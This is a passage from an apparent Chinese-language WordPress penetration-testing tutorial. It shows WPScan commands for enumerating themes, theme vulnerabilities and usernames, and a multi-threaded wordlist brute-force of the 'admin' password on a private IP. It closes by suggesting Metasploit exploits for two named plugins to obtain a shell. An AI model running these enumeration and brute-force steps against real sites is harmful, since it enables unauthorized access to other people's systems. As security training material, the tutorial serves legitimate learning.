可以看出该插件存在SQL注入和XSS
扫描主题
wpscan --url http://xxx.xxx -e t
可以看到使用的主题有oceanwp、twentynineteen等
扫描主题漏洞
wpscan --api-token xxxxxxxxxxxxxxx --url http://xxx.xxx -e vt
该网站wordpress主题没有漏洞
枚举wordpress用户名
wpscan --url http://xxx.xxx -e u
扫描出3个用户名:user、titus、esther
暴力破解密码
wpscan –u http://192.168.10.44 --wordlist /root/Desktop/dict.txt --username admin --threads 100 #指定用户名为admin,密码为 /root/Desktop/dict.txt 字典文件中的数据
第一个用户user爆破失败,不巧第二个、第三个用户密码也爆破失败
结合MSF获取shell
结合我们直接扫描出的插件漏洞:team-members、wp-statistics
模糊搜索即可,如果msf存在漏洞利用,直接利用即可
以上就是本文全部内容,希望大家可以有所收获!